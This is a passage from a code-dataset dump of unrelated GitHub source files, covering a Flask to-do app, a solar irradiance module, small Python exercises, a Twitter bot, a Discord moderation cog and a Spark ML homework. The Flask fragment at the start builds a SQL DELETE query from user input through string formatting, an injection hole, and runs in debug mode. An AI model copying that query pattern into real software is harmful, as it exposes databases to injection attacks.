mycursor.execute(f\"DELETE FROM tareas WHERE nota='{del_val}'\")\r\n mydb.commit()\r\n return redirect(url_for(\"tareas\"))\r\n else:\r\n return render_template(\"Tareas.html\", tasks=tasks)\r\n\r\n\r\ndef main():\r\n mycursor.execute(\"SELECT nota FROM tareas WHERE usuario='root' \")\r\n result = mycursor.fetchall()\r\n tasks = []\r\n for i in result:\r\n tasks.append(i[0])\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n # main()\r\n","repo_name":"0244198/herrerpmtodolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16389380798","text":"\n# Escreva um programa que declare um inteiro, inicialize-o com O, e incremente-o de 1000 em 1000, imprimindo seu valor na tela, até que seu valor seja 100000 (cem mil).\n\na = 0\n\nwhile True:\n a = a + 1000\n print(a)\n if (a == 100000):\n break\n\n\n#OK","repo_name":"MARIAMEDEIRO/Python-list","sub_path":"atvvd3.py","file_name":"atvvd3.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2561731568","text":"import os\ncurrent_dir = os.getcwd()\n# files = os.listdir(current_dir)\nprint(current_dir)\n# print(files)\n\ndef fix_single_dir(current_dir, files):\n def file_filter(files):\n if files.endswith('.m4s'):\n return True\n return False\n files = list(filter(file_filter, files))\n\n path = []\n for i in range(len(files)):\n path.append(current_dir+\"\\\\\"+files[i])\n\n for i in range(len(files)):\n files[i] = files[i][:-3] + 'mp4'\n print(files)\n new_path=[]\n for i in range(len(files)):\n new_path.append(current_dir+\"\\\\\"+files[i])\n\n def fix_m4s(target_path:str, output_path:str, buffer_size=256*1024*1024) -> None:\n assert buffer_size > 0\n with open(target_path, 'rb') as f:\n header = f.read(32)\n new_header = header.replace(b'000000000', b'')\n new_header = new_header.replace(b'$', b' ')\n new_header = new_header.replace(b'avc1', b'')\n with open(output_path, 'wb') as output_file:\n output_file.write(new_header)\n i = f.read(buffer_size)\n while i:\n output_file.write(i)\n i = f.read(buffer_size)\n \n for i in range(len(files)):\n fix_m4s(path[i], new_path[i])\n\n \nfor root, dirs, files in os.walk(current_dir):\n # print(\"-----------root-----------\")\n # print(root)\n # print(\"-----------dirs-----------\")\n # print(dirs)\n # print(\"-----------files-----------\")\n # print(files)\n # next(root)\n # # for single_dir in root:\n # # print(single_dir)\n\n files = os.listdir(root)\n fix_single_dir(current_dir=root, files=files)\n","repo_name":"zty0510/bilibili_merge","sub_path":"fix_m4s.py","file_name":"fix_m4s.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41987278092","text":"#!/usr/bin/env python\n\n\"\"\"\nA class to perform calculation and approximations for obtaining quantities\n such as solar time, solar position, and the various types of solar irradiance.\n\"\"\"\n\nimport datetime\nimport numpy as np\n\nfrom simulation.common import helpers\n\n\nclass SolarCalculations:\n\n def __init__(self, golang=True, library=None):\n \"\"\"\n\n Initializes the instance of a SolarCalculations class\n\n :param golang: Boolean that determines whether GoLang implementations will be used when applicable.\n :param library: GoLang binaries library\n\n \"\"\"\n\n # Solar Constant in W/m2\n self.S_0 = 1353\n\n self.golang = golang\n self.lib = library\n\n # ----- Calculation of solar position in the sky -----\n\n @staticmethod\n def calculate_hour_angle(time_zone_utc, day_of_year, local_time, longitude):\n \"\"\"\n\n Calculates and returns the Hour Angle of the Sun in the sky.\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/solar-time\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :param np.ndarray longitude: The longitude of a location on Earth\n :returns: The Hour Angle in degrees.\n :rtype: np.ndarray\n\n \"\"\"\n\n lst = helpers.local_time_to_apparent_solar_time(time_zone_utc / 3600, day_of_year,\n local_time, longitude)\n\n hour_angle = 15 * (lst - 12)\n\n return hour_angle\n\n def calculate_elevation_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Elevation Angle of the Sun relative to a location on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/elevation-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset. For example, Vancouver has time_zone_utc = -7\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :returns: The elevation angle in degrees\n :rtype: np.ndarray\n\n \"\"\"\n\n # Negative declination angles: Northern Hemisphere winter\n # 0 declination angle : Equinoxes (March 22, Sept 22)\n # Positive declination angle: Northern Hemisphere summer\n declination_angle = helpers.calculate_declination_angle(day_of_year)\n\n # Negative hour angles: Morning\n # 0 hour angle : Solar noon\n # Positive hour angle: Afternoon\n hour_angle = self.calculate_hour_angle(time_zone_utc, day_of_year,\n local_time, longitude)\n # From: https://en.wikipedia.org/wiki/Hour_angle#:~:text=At%20solar%20noon%20the%20hour,times%201.5%20hours%20before%20noon).\n # \"For example, at 10:30 AM local apparent time\n # the hour angle is −22.5° (15° per hour times 1.5 hours before noon).\"\n\n # mathy part is delegated to a helper function to optimize for numba compilation\n return helpers.compute_elevation_angle_math(declination_angle, hour_angle, latitude)\n\n def calculate_zenith_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Zenith Angle of the Sun relative to a location on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/azimuth-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param latitude: The latitude of a location on Earth\n :param longitude: The longitude of a location on Earth\n :param time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :return: The zenith angle in degrees\n :rtype: float\n\n \"\"\"\n\n elevation_angle = self.calculate_elevation_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n return 90 - elevation_angle\n\n def calculate_azimuth_angle(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time):\n \"\"\"\n\n Calculates the Azimuth Angle of the Sun relative to a location on the Earth.\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/azimuth-angle\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param latitude: The latitude of a location on Earth\n :param longitude: The longitude of a location on Earth\n :param time_zone_utc: The UTC time zone of your area in hours of UTC offset. For example, Vancouver has time_zone_utc = -7\n :param day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :returns: The azimuth angle in degrees\n :rtype: np.ndarray\n\n \"\"\"\n\n declination_angle = helpers.calculate_declination_angle(day_of_year)\n hour_angle = self.calculate_hour_angle(time_zone_utc, day_of_year,\n local_time, longitude)\n\n term_1 = np.sin(np.radians(declination_angle)) * \\\n np.sin(np.radians(latitude))\n\n term_2 = np.cos(np.radians(declination_angle)) * \\\n np.sin(np.radians(latitude)) * \\\n np.cos(np.radians(hour_angle))\n\n elevation_angle = self.calculate_elevation_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n term_3 = np.float_(term_1 - term_2) / \\\n np.cos(np.radians(elevation_angle))\n\n if term_3 < -1:\n term_3 = -1\n elif term_3 > 1:\n term_3 = 1\n\n azimuth_angle = np.arcsin(term_3)\n\n return np.degrees(azimuth_angle)\n\n # ----- Calculation of sunrise and sunset times -----\n\n # ----- Calculation of modes of solar irradiance -----\n\n def calculate_DNI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation):\n \"\"\"\n\n Calculates the Direct Normal Irradiance from the Sun, relative to a location\n on the Earth (clearsky)\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight. (Adjust for Daylight Savings)\n :param np.ndarray elevation: The local elevation of a location in metres\n :returns: The Direct Normal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n zenith_angle = self.calculate_zenith_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n a = 0.14\n\n # air_mass = 1 / (math.cos(math.radians(zenith_angle)) + \\\n # 0.50572*pow((96.07995 - zenith_angle), -1.6364))\n\n air_mass = np.float_(1) / np.float_(np.cos(np.radians(zenith_angle)))\n with np.errstate(over=\"ignore\"):\n DNI = self.S_0 * ((1 - a * elevation * 0.001) * np.power(np.power(0.7, air_mass),\n 0.678) + a * elevation * 0.001)\n return np.where(zenith_angle > 90, 0, DNI)\n\n def calculate_DHI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation):\n \"\"\"\n\n Calculates the Diffuse Horizontal Irradiance from the Sun, relative to a location\n on the Earth (clearsky)\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset.\n :param np.ndarray np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight\n :param np.ndarray elevation: The local elevation of a location in metres\n :returns: The Diffuse Horizontal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n DNI = self.calculate_DNI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n DHI = 0.1 * DNI\n\n return DHI\n\n def calculate_GHI(self, latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation, cloud_cover):\n \"\"\"\n\n Calculates the Global Horizontal Irradiance from the Sun, relative to a location\n on the Earth\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local time and time_zone_utc are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray latitude: The latitude of a location on Earth\n :param np.ndarray longitude: The longitude of a location on Earth\n :param np.ndarray time_zone_utc: The UTC time zone of your area in hours of UTC offset, without including the effects of Daylight Savings Time. For example, Vancouver has time_zone_utc = -8 year-round.\n :param np.ndarray day_of_year: The number of the day of the current year, with January 1 being the first day of the year.\n :param np.ndarray local_time: The local time in hours from midnight.\n :param np.ndarray elevation: The local elevation of a location in metres\n :param np.ndarray cloud_cover: A NumPy array representing cloud cover as a percentage from 0 to 100\n :returns: The Global Horizontal Irradiance in W/m^2\n :rtype: np.ndarray\n\n \"\"\"\n\n DHI = self.calculate_DHI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n DNI = self.calculate_DNI(latitude, longitude, time_zone_utc, day_of_year,\n local_time, elevation)\n\n zenith_angle = self.calculate_zenith_angle(latitude, longitude,\n time_zone_utc, day_of_year, local_time)\n\n GHI = DNI * np.cos(np.radians(zenith_angle)) + DHI\n\n return self.apply_cloud_cover(GHI=GHI, cloud_cover=cloud_cover)\n\n @staticmethod\n def apply_cloud_cover(GHI, cloud_cover):\n \"\"\"\n\n Applies a cloud cover model to the GHI data.\n\n Cloud cover adjustment follows the equation laid out here:\n http://www.shodor.org/os411/courses/_master/tools/calculators/solarrad/\n\n :param np.ndarray GHI: Global Horizontal Index in W/m^2\n :param np.ndarray cloud_cover: A NumPy array representing cloud cover as a percentage from 0 to 100\n\n :returns: GHI after considering cloud cover data\n :rtype: np.ndarray\n\n \"\"\"\n\n assert np.logical_and(cloud_cover >= 0, cloud_cover <= 100).all()\n\n scaled_cloud_cover = cloud_cover / 100\n\n assert np.logical_and(scaled_cloud_cover >= 0,\n scaled_cloud_cover <= 1).all()\n\n return GHI * (1 - (0.75 * np.power(scaled_cloud_cover, 3.4)))\n\n # ----- Calculation of modes of solar irradiance, but returning numpy arrays -----\n def python_calculate_array_GHI_times(self, local_times):\n date = list(map(datetime.datetime.utcfromtimestamp, local_times))\n day_of_year = np.array(list(map(helpers.get_day_of_year_map, date)), dtype=np.float64)\n local_time = np.array(list(map(SolarCalculations.dateConvert, date)))\n return day_of_year, local_time\n\n @staticmethod\n def dateConvert(date):\n \"\"\"\n\n Convert a date into local time.\n\n :param datetime.date date: date to be converted\n :return: a date converted into local time.\n :rtype: int\n\n \"\"\"\n\n return date.hour + (float(date.minute * 60 + date.second) / 3600)\n\n def calculate_array_GHI(self, coords, time_zones, local_times,\n elevations, cloud_covers):\n \"\"\"\n\n Calculates the Global Horizontal Irradiance from the Sun, relative to a location\n on the Earth, for arrays of coordinates, times, elevations and weathers\n https://www.pveducation.org/pvcdrom/properties-of-sunlight/calculation-of-solar-insolation\n Note: If local_times and time_zones are both unadjusted for Daylight Savings, the\n calculation will end up just the same\n\n :param np.ndarray coords: (float[N][lat, lng]) array of latitudes and longitudes\n :param np.ndarray time_zones: (int[N]) time zones at different locations in seconds relative to UTC\n :param np.ndarray local_times: (int[N]) unix time that the vehicle will be at each location. (Adjusted for Daylight Savings)\n :param np.ndarray elevations: (float[N]) elevation from sea level in m\n :param np.ndarray cloud_covers: (float[N]) percentage cloud cover in range of 0 to 1\n :returns: (float[N]) Global Horizontal Irradiance in W/m2\n :rtype: np.ndarray\n\n \"\"\"\n\n if not self.golang:\n day_of_year, local_time = self.python_calculate_array_GHI_times(local_times)\n else:\n day_of_year, local_time = self.lib.golang_calculate_array_GHI_times(local_times)\n\n ghi = self.calculate_GHI(coords[:, 0], coords[:, 1], time_zones,\n day_of_year, local_time, elevations, cloud_covers)\n\n return ghi\n","repo_name":"UBC-Solar/Simulation","sub_path":"simulation/environment/SolarCalculations.py","file_name":"SolarCalculations.py","file_ext":"py","file_size_in_byte":15475,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"73136280194","text":"import calendar\nimport os\nimport tweepy\nfrom datetime import datetime as dt\nfrom dotenv import load_dotenv, find_dotenv\n\n# Load environment variables\nload_dotenv(find_dotenv())\n\n# Define constants\nAPI_KEY = os.getenv(\"api_key\")\nAPI_SECRET_KEY = os.getenv(\"api_secret_key\")\nACCESS_TOKEN = os.getenv(\"access_token\")\nACCESS_TOKEN_SECRET = os.getenv(\"access_token_secret\")\nVIDEO_PATH = 'nomina.mp4'\n\n# Authentication in Twitter API\nauth = tweepy.OAuth1UserHandler(\n API_KEY, API_SECRET_KEY, ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\n\n# Aux function to determine if today is a pay day\n\n\ndef is_payday():\n today = dt.today()\n t_day = today.day\n t_weekday = today.weekday()\n month_end = calendar.monthrange(today.year, today.month)[1]\n # Condition to determine of it is mid-month pay day\n cond_mid_month = (t_day == 15 and t_weekday not in [5, 6]) or (\n t_day in (13, 14) and t_weekday == 4)\n # Condition to determine of it is end-of-month pay day\n cond_end_month = (t_day == month_end and t_weekday not in [5, 6]) or (\n t_day in (month_end - 1, month_end - 2) and t_weekday == 4)\n # Check combined conditions and return\n return cond_mid_month or cond_end_month\n\n\nif is_payday():\n upload_result = api.media_upload(VIDEO_PATH)\n api.update_status(status=\"\", media_ids=[\n upload_result.media_id_string])\n","repo_name":"baldesco/betty_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23398786365","text":"#Import random module to access random.choice\nimport random\n\n#Get the choice of the player via input and the computer via random.choice\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\n#check win conditions with nested functions\ndef check_win(player, computer):\n print(f\"You chose {player}, computer chose {computer}.\")\n if player == computer:\n return \"It's a tie!\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors, you win!\"\n else:\n return \"Paper covers rock, you lose\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts paper, you lose.\"\n else:\n return \"paper covers rock, you win!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors, you lose.\"\n else:\n return \"Scissors cuts paper, you win!\"\n else:\n if player != \"rock\" or \"scissors\" or \"paper\":\n return \"You idiot, that's not a good choice, YOU ARE A LOSER!\"\n\n#Define the functions of the game \ndef game():\n choices = get_choices()\n result = check_win(choices[\"player\"], choices[\"computer\"])\n print(result)\n restart()\n\n#Restart the game function\ndef restart():\n restart = input(\"Do you wish to play again?(y or n): \")\n if restart == \"y\":\n game()\n else:\n quit()\n\n#run the game \ngame()\n","repo_name":"Roberius/rockpaperscissors","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73916727233","text":"import torch\nimport numpy as np\nfrom torch import autograd\nPFandUKF_test = False\nif torch.cuda.is_available() and not PFandUKF_test:\n dev = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n print(\"Running on the GPU\")\nelse:\n dev = torch.device(\"cpu\")\n torch.set_default_tensor_type('torch.FloatTensor')\n print(\"Running on the CPU\")\n\nr2 = 0.21\nvdB = -20 # ratio v=q2/r2\nv = 10 ** (vdB / 10)\nq2 = torch.mul(v, r2)\nq = torch.sqrt(q2)\n\nT = 200 # For other trajectories size need to be changed\nT_test = T\nm = 10 # For other vector size need to be changed\nn = 10 # For other vector size need to be changed\nF = torch.eye(10).to(dev)\nH = torch.diag(torch.tensor([0.1, 0.2, 0.3, 0.1, 0.2, 0.3, 0.1, 0.2, 0.3, 0.4])).to(dev)\nm1x_0 = torch.ones(m, 1).to(dev)\nm2x_0 = 0 * 0 * torch.eye(m).to(dev)\n\n\n\nL = torch.Tensor([[3, -1, 0, 0, 0, 0, -1, 0, 0, -1],\n [-1, 2, 0, 0, 0, 0, 0, 0, -1, 0],\n [0, 0, 2, -1, 0, 0, 0, -1, 0, 0],\n [0, 0, -1, 3, -1, -1, 0, 0, 0, 0],\n [0, 0, 0, -1, 3, 0, 0, -1, -1, 0],\n [0, 0, 0, -1, 0, 3, 0, 0, -1, -1],\n [-1, 0, 0, 0, 0, 0, 3, -1, 0, -1],\n [0, 0, -1, 0, -1, 0, -1, 3, 0, 0],\n [0, -1, 0, 0, -1, -1, 0, 0, 3, 0],\n [-1, 0, 0, 0, 0, -1, -1, 0, 0, 3]]).to(dev)\n\n# L = torch.Tensor([[6, -1, 0, -1, -1, -1, -1, 0, 0, -1],\n# [-1, 6, 0, -1, 0, -1, -1, -1, 0, -1],\n# [0, 0, 6, -1, -1, -1, 0, -1, -1, -1],\n# [-1, -1, -1, 6, -1, 0, -1, 0, 0, -1],\n# [-1, 0, -1, -1, 6, 0, -1, -1, -1, 0],\n# [-1, -1, -1, 0, 0, 6, 0, -1, -1, -1],\n# [-1, -1, 0, -1, -1, 0, 6, -1, -1, 0],\n# [0, -1, -1, 0, -1, -1, -1, 6, -1, 0],\n# [0, 0, -1, 0, -1, -1, -1, -1, 6, -1],\n# [-1, -1, -1, -1, 0, -1, 0, 0, -1, 6]])\n\n\n\nW, V = np.linalg.eig(L.cpu())\nV = torch.from_numpy(V).type(torch.FloatTensor).to(dev)\nV_t = torch.transpose(V, 0, 1).to(dev)\nL = torch.tensor(L).type(torch.FloatTensor).to(dev)\n\n\n\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2 # which is 3.1415927410125732\n\ndef f(x):\n return torch.matmul(F.type(torch.DoubleTensor), x.type(torch.DoubleTensor))\n\ndef h(x):\n return torch.matmul(H.type(torch.DoubleTensor), x.type(torch.DoubleTensor))\n\ndef Naive(x):\n H_inv = torch.inverse(H.to(dev))\n return torch.matmul(H_inv.type(torch.DoubleTensor), x.type(torch.DoubleTensor)).to(dev)\n\ndef getJacobian(x, a):\n try:\n if (x.size()[1] == 1):\n y = torch.reshape((x.T), [x.size()[0]])\n except:\n y = torch.reshape((x.T), [x.size()[0]])\n\n if (a == 'ObsAcc'):\n g = h\n elif (a == 'ModAcc'):\n g = f\n print(x.shape)\n Jac = autograd.functional.jacobian(g, y)\n Jac = Jac.view(-1, m)\n\n return Jac.to(dev)\n","repo_name":"NimrodLeinwand/GSP-KalmanNet","sub_path":"Simulations/Random Walk/Random_Walk_parameters.py","file_name":"Random_Walk_parameters.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71734537793","text":"from logging import Logger\nfrom typing import TYPE_CHECKING\n\nfrom discord.ext.commands import Bot, Cog, Context, command, has_role\n\nfrom onehead.common import (\n Player,\n Roles,\n get_bot_instance,\n get_logger,\n get_player_names,\n)\nfrom onehead.game import Game\nfrom onehead.protocols.database import IPlayerDatabase, Operation\n\nif TYPE_CHECKING:\n from onehead.core import Core\n\n\nlog: Logger = get_logger()\n\n\nclass Behaviour(Cog):\n MAX_BEHAVIOUR_SCORE = 10000\n MIN_BEHAVIOUR_SCORE = 0\n COMMEND_MODIFIER = 100\n REPORT_MODIFIER = -200\n\n def __init__(self, database: IPlayerDatabase) -> None:\n self.database: IPlayerDatabase = database\n\n @has_role(Roles.MEMBER)\n @command()\n async def commend(self, ctx: Context, player_name: str) -> None:\n \"\"\"\n Commend a player for playing well.\n \"\"\"\n\n bot: Bot = get_bot_instance()\n core: Core = bot.get_cog(\"Core\") # type: ignore[assignment]\n previous_game: Game | None = core.previous_game\n\n if previous_game is None or previous_game.radiant is None or previous_game.dire is None:\n await ctx.send(\"Unable to commend as a game is yet to be played.\")\n return\n\n commender: str = ctx.author.display_name\n radiant, dire = get_player_names(previous_game.radiant, previous_game.dire)\n if commender not in radiant and commender not in dire:\n await ctx.send(\n f\"{commender} did not participate in the previous game and therefore cannot commend another player.\"\n )\n return\n\n if commender == player_name:\n await ctx.send(f\"{commender} you cannot commend yourself, nice try...\")\n return\n\n if player_name not in radiant and player_name not in dire:\n await ctx.send(f\"{player_name} cannot be commended as they did not participate in the previous game.\")\n return\n\n if previous_game.has_been_previously_commended(commender, player_name):\n await ctx.send(f\"{player_name} has already been commended by {commender}.\")\n return\n\n player: Player | None = self.database.get(player_name)\n if player is None:\n await ctx.send(f\"{player_name} could not be found in the database.\")\n return\n\n current_behaviour_score: int = player[\"behaviour\"]\n\n new_score: int = min(current_behaviour_score + self.COMMEND_MODIFIER, self.MAX_BEHAVIOUR_SCORE)\n\n self.database.modify(player_name, \"behaviour\", new_score)\n self.database.modify(player_name, \"commends\", 1, operation=Operation.ADD)\n\n previous_game.add_commend(commender, player_name)\n\n await ctx.send(f\"{player_name} has been commended.\")\n\n @has_role(Roles.MEMBER)\n @command()\n async def report(self, ctx: Context, player_name: str, *, reason: str) -> None:\n \"\"\"\n Report a player for intentionally ruining the game experience.\n \"\"\"\n\n bot: Bot = get_bot_instance()\n core: Core = bot.get_cog(\"Core\") # type: ignore[assignment]\n previous_game: Game | None = core.previous_game\n\n if previous_game is None or previous_game.radiant is None or previous_game.dire is None:\n await ctx.send(\"Unable to report as a game is yet to be played.\")\n return\n\n reporter: str = ctx.author.display_name\n radiant, dire = get_player_names(previous_game.radiant, previous_game.dire)\n if reporter not in radiant and reporter not in dire:\n await ctx.send(\n f\"{reporter} did not participate in the previous game and therefore cannot report another player.\"\n )\n return\n\n if reporter == player_name:\n await ctx.send(\n f\"{player_name} has brought dishonour upon themselves and has attempted to commit seppuku. OneHead will now allow it... UWU!\"\n )\n return\n\n if player_name not in radiant and player_name not in dire:\n await ctx.send(f\"{player_name} cannot be reported as they did not participate in the previous game.\")\n return\n\n if previous_game.has_been_previously_reported(reporter, player_name):\n await ctx.send(f\"{player_name} has already been reported by {reporter}.\")\n return\n\n player: Player | None = self.database.get(player_name)\n if player is None:\n await ctx.send(f\"{player_name} could not be found in the database.\")\n return\n\n current_behaviour_score: int = player[\"behaviour\"]\n\n new_score: int = max(current_behaviour_score + self.REPORT_MODIFIER, self.MIN_BEHAVIOUR_SCORE)\n\n self.database.modify(player_name, \"behaviour\", new_score)\n self.database.modify(player_name, \"reports\", 1, Operation.ADD)\n\n previous_game.add_report(reporter, player_name)\n\n log.info(f\"{ctx.author.display_name} reported {player_name} for {reason}\")\n\n await ctx.send(f\"{player_name} has been reported.\")\n","repo_name":"belmegatron/OneHead","sub_path":"onehead/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"2962503968","text":"from flask import Blueprint as _Blueprint\n\n\nclass Blueprint(_Blueprint):\n '''新增rp_list属性'''\n\n def __init__(self, name, import_name, rp_list=[], static_folder=None,\n static_url_path=None, template_folder=None,\n url_prefix=None, subdomain=None, url_defaults=None,\n root_path=None):\n self.rp_list = rp_list\n super(Blueprint, self).__init__(\n name, import_name, static_folder,\n static_url_path, template_folder,\n url_prefix, subdomain, url_defaults,\n root_path\n )\n\n @property\n def tags(self):\n '''\n Swagger API 文档分类\n 数组中的顺序代表 Swagger 中的顺序\n '''\n return [rp.api.tag for rp in self.rp_list]\n\n def register_redprint(self):\n for rp in self.rp_list:\n rp.api.register(self)\n return self\n","repo_name":"Piiiiiii/SQLAlchemy-Flask-Swagger","sub_path":"app/libs/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11674386331","text":"# Databricks notebook source\n# MAGIC %md # DSCI 617 –Homework 06\n# MAGIC ** Shahid Abdulaziz**\n\n# COMMAND ----------\n\nimport math\nimport pandas as pd\nimport numpy as np\nimport pyspark as py\nimport pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\nfrom pyspark.mllib.random import RandomRDDs\nfrom string import punctuation\nfrom operator import add\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, DoubleType, LongType\nimport matplotlib.pyplot as plt\nfrom pyspark.sql.functions import col, expr\nfrom pyspark.sql.functions import desc\nfrom pyspark.sql.functions import asc\nfrom pyspark.ml.feature import VectorAssembler, StringIndexer, OneHotEncoder\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import LogisticRegression \nfrom pyspark.ml import Pipeline\nfrom pyspark.mllib.evaluation import MulticlassMetrics\n\n# COMMAND ----------\n\nspark = SparkSession.builder.getOrCreate()\nsc = spark.sparkContext\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 1: Load Stroke Data\n\n# COMMAND ----------\n\nstroke_schema = (\n 'gender STRING, age DOUBLE, hypertension INTEGER, heart_disease INTEGER, '\n 'ever_married STRING, work_type STRING, residence_type STRING, avg_glucose_level DOUBLE, ' \n ' bmi DOUBLE, smoking_status STRING, stroke INTEGER ')\n \n\nstroke_df = (\n spark.read\n .option('delimiter', ',')\n .option('header', True)\n .schema(stroke_schema )\n .csv('/FileStore/tables/stroke_data.csv')\n)\n\n\n \nstroke_df .printSchema()\n\n# COMMAND ----------\n\nstroke_df.show(10)\n\n# COMMAND ----------\n\nN = stroke_df.count()\nprint(N)\n\n# COMMAND ----------\n\n(stroke_df\n .select('*')\n .groupBy('stroke')\n .agg(\n F.round((F.count(col('stroke'))/N),4).alias('prop')\n )\n .show()\n\n\n)\n\n# COMMAND ----------\n\n# MAGIC %md # Problem 2: Preprocessing\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nnum_features = ['age','avg_glucose_level','bmi']\ncat_features = ['gender','hypertension','heart_disease','ever_married','work_type','residence_type','smoking_status']\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nix_features = [c + '_ix' for c in cat_features]\nvec_features = [c + '_vec' for c in cat_features]\n\n\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nlabel_indexer = StringIndexer(inputCol='stroke', outputCol='label').setHandleInvalid(\"keep\") \nfeature_indexer = StringIndexer(inputCols=cat_features, outputCols=ix_features)\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nencoder = OneHotEncoder(inputCols=ix_features, outputCols=vec_features, dropLast= False)\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nassembler = VectorAssembler(inputCols=num_features + vec_features, outputCol='features')\n\n\n# COMMAND 